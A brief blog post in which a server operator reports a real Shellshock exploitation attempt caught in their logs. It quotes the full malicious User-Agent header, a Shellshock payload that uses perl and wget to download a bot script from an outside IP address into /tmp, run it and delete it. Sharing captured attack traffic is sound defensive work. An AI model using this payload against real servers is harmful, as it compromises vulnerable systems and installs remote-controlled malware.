My First Real Shellshock

Apart from a harmless backping immediately after the shellshock vulnerability became known, here’s now the first time that I noticed an actual exploit. (There may have been others that went unnoticed who might have just used some http headers). This one caused a 404 by accessing “/phppath/cgi_wrapper”, which we don’t have on our servers. So here’s the User-Agent string – have fun reading the perl script that it’s trying to download and execute:

() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESSX";system("wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl");'
This entry was posted in Software. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *

Please solve this little equation for verifying that you\'re human *